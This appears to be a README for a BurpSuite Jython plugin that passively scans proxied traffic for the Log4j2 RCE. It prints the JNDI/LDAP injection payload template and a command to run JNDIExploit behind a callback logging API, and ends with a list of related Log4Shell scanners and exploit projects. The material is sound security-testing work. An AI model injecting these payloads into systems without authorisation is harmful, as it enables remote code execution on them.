BurpSuite Extension: Log4j RCE Scanner

Overview

Log4j2 RCE Scanner

作者:key@元亨实验室

小广告:实验室纳新招人,岗位方向有安全研究(攻防、漏洞)、威胁情报(APT分析)、内部安全(SDL、安全研发),简历投递至邮箱:c2VjdXJpdHlAemhvbmdmdS5uZXQ=

前言

这是一个用于扫描近期爆出的Log4j2 RCE漏洞的BurpSuite插件,其原理就是基于BurpSuite提供的被动式扫描API,对流经Burp Proxy模块的流量进行全量扫描,扫描作用域为:请求参数(JSON字段、正常请求参数、Cookie参数、XML字段、Mulitpart)、请求头(请求自带请求头与自定义请求头)。

它与其他插件的区别:

  1. 一个点一个Payload(Hash区分),便于追踪漏洞位置;
  2. 仅支持LDAP Log接口,不支持DNS扫描探测,便于快速定位有效漏洞位置进行自查自检;
  3. 使用Python(Jython)编写,可以非常快速的进行二次开发、代码阅读,例如你可以改造这个项目为SQL注入、XSS盲打的探测插件;
  4. 支持扫描作用域相对较全。

使用方法

  1. 准备工作:该插件用Python(Jython)所写,所以需要你的BurpSuite加载Jython的Jar包,下载地址:https://repo1.maven.org/maven2/org/python/jython-standalone/2.7.2/jython-standalone-2.7.2.jar,BurpSuite加载位置:BurpSuite - Extender - Options - Python Environment - Location of Jython standalone JAR file。

  2. 准备LDAP Log接口:由于插件的特殊性,在不更改插件代码的情况下,建议你准备一台服务器,在上面部署LDAP服务并提供一个Web API给到插件,这里推荐Command2API项目,搭配JNDIExploit使用。

    python Command2Api.py "java -jar JNDIExploit.v1.2/JNDIExploit-1.2-SNAPSHOT.jar -i 0.0.0.0" 9889

  3. 填写配置:下载Python文件到本地,存储在无空格、无特殊符号、无中文的目录下,接着替换如下代码:

    LDAP 服务的主机地址(域名/IP,请注意内、外网环境) # LDAP_PORT -> LDAP 服务的主机端口 return self._helpers.urlEncode("${jndi:ldap://LDAP_HOST:LDAP_PORT/" + random_md5 + "}")">
    # LDAP_API_HOST -> LDAP Log接口的主机地址(域名/IP,请注意内、外网环境)
    # LDAP_API_PORT -> LDAP Log接口的主机端口
    # LDAP_API_PORT -> LDAP Log接口的路由
    # 建议搭配Command2API项目一起使用,其他接口请自行更改代码
    url = "http://LDAP_API_HOST:LDAP_API_PORT/LDAP_API_ROUTE"
    # LDAP_HOST -> LDAP 服务的主机地址(域名/IP,请注意内、外网环境)
    # LDAP_PORT -> LDAP 服务的主机端口
    return self._helpers.urlEncode("${jndi:ldap://LDAP_HOST:LDAP_PORT/" + random_md5 + "}")

  4. 加载插件:BurpSuite加载位置:BurpSuite - Extender - Extensions - Burp Extensions - Add。

  5. 开始扫描:浏览器挂上BurpSuite代理,让流量流经BurpSuite,插件会自动扫描,或者你可以选择结合爬虫的方式将爬虫流量过到BurpSuite进行扫描。

  6. 扫描结果:扫描结果会在Burp Dashboard中展示出来,并且有具体的请求报文,如下图所示,分别是Command2API与LDAP服务接收的日志(由于该漏洞的触发特殊性,建议对这些日志和BurpSuite流量进行保存)以及Burp的扫描结果。

You might also like...
A Python Scanner for log4j

log4j-Scanner scanner for log4j cat web-urls.txt | python3 log4j.py ID.burpcollaborator.net web-urls.txt http://127.0.0.1:8080 https://www.google.c

A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts
A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts

log4j-scan A fully automated, accurate, and extensive scanner for finding vulnerable log4j hosts Features Support for lists of URLs. Fuzzing for more

Log4jScanner is a Log4j Related CVEs Scanner, Designed to Help Penetration Testers to Perform Black Box Testing on given subdomains.
Log4jScanner is a Log4j Related CVEs Scanner, Designed to Help Penetration Testers to Perform Black Box Testing on given subdomains.

Log4jScanner Log4jScanner is a Log4j Related CVEs Scanner, Designed to Help Penetration Testers to Perform Black Box Testing on given subdomains. Disc

Js File Scanner This is Js File Scanner
Js File Scanner This is Js File Scanner

Js File Scanner This is Js File Scanner . Which are scan in js file and find juicy information Toke,Password Etc.

Yuyu Scanner is a Web Reconnaissance & Web Analysis Scanner to find assets and information about targets.
Yuyu Scanner is a Web Reconnaissance & Web Analysis Scanner to find assets and information about targets.

Yuyu Scanner Yuyu Scanner is a Web Reconnaissance & Web Analysis Scanner to find assets and information about targets. installation ! run as root

USSR-Scanner - USSR Scanner with python
USSR-Scanner - USSR Scanner with python

Purposes ? Hey there is abosolutely no need to do this we do it only to irritate

A tool to find good RCE From my series: A powerful Burp extension to make bounties rain

A tool to find good RCE From my series: A powerful Burp extension to make bounties rain

A Burp Pro extension that adds log4shell checks to Burp Scanner

scan4log4shell A Burp Pro extension that adds log4shell checks to Burp Scanner, written by Daniel Crowley of IBM X-Force Red. Installation To install

Northwave Log4j CVE-2021-44228 checker

Northwave Log4j CVE-2021-44228 checker Friday 10 December 2021 a new Proof-of-Concept 1 addressing a Remote code Execution (RCE) vulnerability in the

Owner
null
A scanner and a proof of sample exploit for log4j RCE CVE-2021-44228

1.Create a Sample Vulnerable Application . 2.Start a netcat listner . 3.Run the exploit . 5.Use jdk1.8.0_20 for better results . Exploit-db - https://

Isuru Umayanga 7 Aug 6, 2022
An automated header extensive scanner for detecting log4j RCE CVE-2021-44228

log4j An automated header extensive scanner for detecting log4j RCE CVE-2021-44228 Usage $ python3 log4j.py -l urls.txt --dns-log REPLACE_THIS.dnslog.

null 2 Dec 16, 2021
A BurpSuite extension to parse 5GC NF OpenAPI 3.0 files to assess 5G core networks

5GC_API_parse Description 5GC API parse is a BurpSuite extension allowing to assess 5G core network functions, by parsing the OpenAPI 3.0 not supporte

PentHertz 57 Dec 16, 2022
A proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228)

CVE-2021-44228 – Log4j RCE Unauthenticated About This is a proof-of-concept exploit for Log4j RCE Unauthenticated (CVE-2021-44228). This vulnerability

Pedro Havay 20 Nov 11, 2022
Log4j rce test environment and poc

log4jpwn log4j rce test environment See: https://www.lunasec.io/docs/blog/log4j-zero-day/ Experiments to trigger in various software products mentione

Leon Jacobs 307 Dec 24, 2022
POC for detecting the Log4Shell (Log4J RCE) vulnerability.

log4shell-poc-py POC for detecting the Log4Shell (Log4J RCE) vulnerability. Run on a system with python3 python3 log4shell-poc.py <pathToTargetFile> <

BCC Risk Advisory 2 Dec 22, 2021
POC for detecting the Log4Shell (Log4J RCE) vulnerability

Interactsh An OOB interaction gathering server and client library Features • Usage • Interactsh Client • Interactsh Server • Interactsh Integration •

ProjectDiscovery 2.1k Jan 8, 2023
open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability

CVE-2021-44228-log4jVulnScanner-metasploit open detection and scanning tool for discovering and fuzzing for Log4J RCE CVE-2021-44228 vulnerability pre

Taroballz 7 Nov 9, 2022
log4j burp scanner

log4jscanner log4j burp插件 特点如下: 0x01 基于Cookie字段、XFF头字段、UA头字段发送payload 0x02 基于域名的唯一性,将host带入dnslog中 插件主要识别五种形式: 1.get请求,a=1&b=2&c=3 2.post请求,a=1&b=2&c=

null 1 Jun 30, 2022
Log4j-Scanner with Bind-Receipt and custom hostnames

Hrafna - Log4j-Scanner for the masses Features Scanning-system designed to check your own infra for vulnerable log4j-installations start and stop scan

null 18 Jan 23, 2022